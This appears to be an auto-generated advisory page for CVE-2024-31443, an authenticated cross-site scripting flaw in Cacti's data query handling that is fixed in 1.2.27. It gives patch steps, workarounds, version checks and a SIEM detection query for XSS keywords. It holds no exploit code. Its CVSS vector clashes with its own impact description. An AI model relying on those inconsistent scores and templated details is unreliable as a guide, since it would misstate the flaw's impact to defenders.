CVE-2024-31443 – CVE-2024-31443 is a cross-site scripting (XSS) ... (How to Fix)

Q: What is the severity of CVE-2024-31443?

CVE-2024-31443 has a CVSS score of 5.7 (MEDIUM). CVE-2024-31443 is a cross-site scripting (XSS) vulnerability in Cacti's data query functionality. Attackers can inject malicious scripts that execute in users' browsers when viewing certain pages. This affects all Cacti installations prior to version 1.2.27.

📋 TL;DR

CVE-2024-31443 is a cross-site scripting (XSS) vulnerability in Cacti's data query functionality. Attackers can inject malicious scripts that execute in users' browsers when viewing certain pages. This affects all Cacti installations prior to version 1.2.27.

💻 Affected Systems

Products:

Cacti

Versions: All versions prior to 1.2.27

Operating Systems: All platforms running Cacti

Default Config Vulnerable: ⚠️ Yes

Notes: Requires authenticated user access to data query functionality for exploitation.

📦 What is this software?

Cacti by Cacti

View all CVEs affecting Cacti →

Fedora by Fedoraproject

View all CVEs affecting Fedora →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal session cookies, perform actions as authenticated users, or redirect users to malicious sites, potentially leading to full account compromise.

🟠

Likely Case

Attackers inject malicious JavaScript to steal session cookies or credentials from authenticated users viewing vulnerable pages.

🟢

If Mitigated

With proper input validation and output encoding, the impact is limited to script execution in specific contexts with user interaction required.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires authenticated access to the data query functionality. The vulnerability is in form_save() function in data_queries.php.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.2.27

Vendor Advisory: https://github.com/Cacti/cacti/security/advisories/GHSA-rqc8-78cm-85j3

Restart Required: No

Instructions:

1. Backup your Cacti installation and database. 2. Download Cacti 1.2.27 or later from the official repository. 3. Replace the existing installation with the patched version. 4. Verify the patch by checking the version in the Cacti interface.

🔧 Temporary Workarounds

Input Validation Enhancement

all

Implement additional input validation for data query parameters

WAF Rule Implementation

all

Deploy web application firewall rules to block XSS payloads in data query parameters

🧯 If You Can't Patch

Restrict access to Cacti interface to trusted users only
Implement Content Security Policy (CSP) headers to mitigate XSS impact

🔍 How to Verify

Check if Vulnerable:

Check Cacti version in the web interface under 'About' or run: grep '\$version' /path/to/cacti/include/global.php

Check Version:

grep "\$version" /path/to/cacti/include/global.php

Verify Fix Applied:

Verify version is 1.2.27 or higher and check that the commit f946fa537d19678f938ddbd784a10e3290d275cf is present

📡 Detection & Monitoring

Log Indicators:

Unusual POST requests to data_queries.php with script-like content in parameters
Multiple failed authentication attempts followed by successful login

Network Indicators:

HTTP requests containing JavaScript payloads in query parameters
Unexpected outbound connections from Cacti server

SIEM Query:

source="cacti_access.log" AND (uri_path="/data_queries.php" AND (param="script" OR param="javascript" OR param="onerror"))

📊 Metadata

CVE ID: CVE-2024-31443

CVSS v3 Score: 5.7 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H

CWE: CWE-79

Published: May 14, 2024

Last Updated: November 4, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-31443, you might also want to check these: